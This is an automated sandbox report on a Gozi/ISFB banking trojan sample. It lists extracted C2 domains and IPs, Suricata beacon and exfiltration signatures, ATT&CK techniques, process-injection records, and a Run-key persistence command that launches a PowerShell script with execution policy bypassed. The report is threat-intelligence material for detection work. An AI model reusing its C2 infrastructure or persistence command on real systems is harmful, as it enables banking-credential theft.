gozi_ifsb | 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

General

Target

l0V19y95
Size

717B
MD5

54e9306f95f32e50ccd58af19753d929
SHA1

eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA256

45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA512

8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Score

10^/10

gozi_ifsb 3000 banker persistence suricata trojan

Malware Config

Extracted

Family

gozi_ifsb

Botnet

3000

C2

config.edge.skype.com

176.10.119.68

176.10.119.81

Attributes

base_path
/drew/
build
250229
exe_type
loader
extension
.jlk
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi_ifsb

Botnet

3000

C2

config.edge.skype.com

cabrioxmdes.at

gamexperts.net

37.10.71.138

185.158.250.51

Attributes

base_path
/images/
exe_type
worker
extension
.jlk
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb
suricata: ET MALWARE Ursnif Variant CnC Beacon
suricata: ET MALWARE Ursnif Variant CnC Beacon
suricata
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata: ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
suricata
suricata: ET MALWARE Ursnif Variant CnC Data Exfil
suricata: ET MALWARE Ursnif Variant CnC Data Exfil
suricata
Executes dropped EXE 1 IoCs

Processes:

ChromeRecovery.exe

pid process

2956 ChromeRecovery.exe
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

2656 regsvr32.exe

pid	process
2956	ChromeRecovery.exe

pid	process
2656	regsvr32.exe

Unexpected DNS network traffic destination 6 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\HandlerLink = "cmd /c start C:\\Users\\Admin\\HandlerLink.lnk -ep unrestricted -file C:\\Users\\Admin\\StopSheet.ps1"	Explorer.EXE

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 26 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exechrome.exe

description	pid	process	target process
PID 800 set thread context of 1196	800	powershell.exe	Explorer.EXE
PID 1196 set thread context of 2024	1196	Explorer.EXE	chrome.exe
PID 1196 set thread context of 2524	1196	Explorer.EXE	cmd.exe
PID 1196 set thread context of 1956	1196	Explorer.EXE	chrome.exe
PID 2524 set thread context of 2220	2524	cmd.exe	PING.EXE
PID 1196 set thread context of 1048	1196	Explorer.EXE	chrome.exe
PID 1196 set thread context of 980	1196	Explorer.EXE	chrome.exe
PID 1196 set thread context of 1536	1196	Explorer.EXE	chrome.exe
PID 1196 set thread context of 428	1196	Explorer.EXE	cmd.exe
PID 1196 set thread context of 2380	1196	Explorer.EXE	chrome.exe
PID 1196 set thread context of 3044	1196	Explorer.EXE	chrome.exe
PID 1196 set thread context of 2920	1196	Explorer.EXE	chrome.exe
PID 1196 set thread context of 2848	1196	Explorer.EXE	chrome.exe
PID 2024 set thread context of 2360	2024	chrome.exe	chrome.exe
PID 2024 set thread context of 2936	2024	chrome.exe	chrome.exe
PID 2024 set thread context of 1912	2024	chrome.exe	chrome.exe
PID 2024 set thread context of 2512	2024	chrome.exe	chrome.exe
PID 2024 set thread context of 2556	2024	chrome.exe	chrome.exe
PID 2024 set thread context of 3004	2024	chrome.exe	chrome.exe
PID 2024 set thread context of 3036	2024	chrome.exe	chrome.exe
PID 2024 set thread context of 2488	2024	chrome.exe	chrome.exe
PID 2024 set thread context of 2400	2024	chrome.exe	chrome.exe
PID 2024 set thread context of 1664	2024	chrome.exe	chrome.exe
PID 2024 set thread context of 1876	2024	chrome.exe	chrome.exe
PID 2024 set thread context of 3060	2024	chrome.exe	chrome.exe
PID 2024 set thread context of 2760	2024	chrome.exe	chrome.exe

Drops file in Program Files directory 7 IoCs

Processes:

elevation_service.exe

description	ioc	process
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2032_1750563338\_metadata\verified_contents.json	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2032_1750563338\ChromeRecoveryCRX.crx	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2032_1750563338\ChromeRecovery.exe	elevation_service.exe
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2032_1750563338\ChromeRecovery.exe	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2032_1750563338\manifest.json	elevation_service.exe
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2032_1750563338\manifest.json	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir2032_1750563338\_metadata\verified_contents.json	elevation_service.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 3 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exenet.exe

pid process

2272 net.exe
188 net.exe
1720 net.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

2840 tasklist.exe

pid	process
2272	net.exe
188	net.exe
1720	net.exe

pid	process
2840	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

2100 systeminfo.exe
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

pid	process
2100	systeminfo.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 44 IoCs

Processes:

rundll32.exerundll32.exerundll32.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\DMP_auto_file\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\DMP_auto_file	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\DMP_auto_file\shell\edit\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1"	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\DMP_auto_file\shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\DMP_auto_file\shell\edit\command	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\.DMP	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\DMP_auto_file\shell\open	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\MRUListEx = ffffffff	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\DMP_auto_file\	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\.DMP\ = "DMP_auto_file"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_Classes\Local Settings	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 = 88003100000000008e54dba5110050524f4752417e310000700008000400efbeee3a851a8e54dba52a0000003c000000000001000000000000000000460000000000500072006f006700720061006d002000460069006c0065007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003100000018000000	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 0100000000000000ffffffff	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 000000000100000002000000ffffffff	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\NodeSlot = "7"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\DMP_auto_file\shell\edit	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\DMP_auto_file\shell\open\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1"	rundll32.exe

Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2220 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

Processes:

regsvr32.exePING.EXE

pid process

2732 regsvr32.exe
2220 PING.EXE

pid	process
2220	PING.EXE

pid	process
2732	regsvr32.exe
2220	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exechrome.exechrome.exe

pid	process
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1048	chrome.exe
2024	chrome.exe
2024	chrome.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

taskmgr.exerundll32.exe

pid process

1628 taskmgr.exe
2244 rundll32.exe

Suspicious behavior: MapViewOfSection 26 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exechrome.exe

pid	process
800	powershell.exe
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
2524	cmd.exe
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs

Processes:

taskmgr.exeAUDIODG.EXE7zG.exeAUDIODG.EXEpowershell.exeExplorer.EXEtasklist.exe

description	pid	process
Token: SeDebugPrivilege	1628	taskmgr.exe
Token: 33	2748	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2748	AUDIODG.EXE
Token: 33	2748	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2748	AUDIODG.EXE
Token: SeRestorePrivilege	2908	7zG.exe
Token: 35	2908	7zG.exe
Token: SeSecurityPrivilege	2908	7zG.exe
Token: SeSecurityPrivilege	2908	7zG.exe
Token: SeShutdownPrivilege	1628	taskmgr.exe
Token: SeShutdownPrivilege	1628	taskmgr.exe
Token: 33	2928	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2928	AUDIODG.EXE
Token: 33	2928	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2928	AUDIODG.EXE
Token: SeShutdownPrivilege	1628	taskmgr.exe
Token: SeDebugPrivilege	800	powershell.exe
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeDebugPrivilege	2840	tasklist.exe
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exechrome.exe

pid	process
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exechrome.exe

pid	process
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
1628	taskmgr.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe
2024	chrome.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

rundll32.exeExplorer.EXE

pid process

2244 rundll32.exe
1196 Explorer.EXE

pid	process
2244	rundll32.exe
1196	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 2024 wrote to memory of 1956	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1956	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1956	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1768	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1048	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1048	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 1048	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe
PID 2024 wrote to memory of 980	2024	chrome.exe	chrome.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1196

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\l0V19y95
2⤵
PID:1660

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
2⤵
- Suspicious use of SetThreadContext
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
